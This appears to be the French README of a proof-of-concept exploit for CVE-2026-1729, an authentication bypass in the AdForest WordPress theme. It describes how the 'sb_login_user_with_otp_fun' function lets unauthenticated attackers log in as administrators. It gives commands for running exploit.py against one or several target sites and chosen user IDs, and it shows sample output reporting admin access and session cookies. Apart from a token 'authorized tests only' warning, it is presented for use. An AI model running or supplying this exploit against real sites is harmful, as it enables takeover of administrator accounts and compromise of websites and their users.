
Le thème AdForest pour WordPress est vulnérable à un contournement d'authentification dans toutes les versions, y compris la 6.0.12. Cela est dû au fait que le plugin ne vérifie pas correctement l'identité d'un utilisateur avant de l'authentifier via la fonction 'sb_login_user_with_otp_fun'. Cela permet à des attaquants non authentifiés de se connecter, y compris en tant qu'administrateur.
Preuve de concept simple pour CVE-2026-1729 (PoC) - Vulnérabilité de contournement d'authentification dans le thème WordPress AdForest. Réalisé par f3ds cr3w est 2oo2 blog
requestspip install requests
python poc/exploit.py https://site-cible.com
python poc/exploit.py https://site-cible.com --user-id 2
# Exploiter l'admin par défaut (ID utilisateur 1)
python poc/exploit.py https://example.com
# Exploiter un compte utilisateur spécifique
python poc/exploit.py https://example.com --user-id 5
# Tester plusieurs cibles
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3
CVE-2026-1729 - Contournement d'authentification AdForest WordPress
=======================================================
ATTENTION : Pour tests autorisés uniquement !
=======================================================
[+] Cible : https://example.com
[+] ID utilisateur ciblé : 1
[+] Envoi de l'exploit vers : https://example.com/wp-admin/admin-ajax.php
[+] SUCCÈS ! Accès administrateur accordé
[+] URL admin : https://example.com/wp-admin/
[+] Cookies de session : {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] Connecté en tant que : admin
🎯 Exploit terminé avec succès !
Vous avez maintenant un accès administrateur au site WordPress.
/wp-admin/Si l'exploit échoue :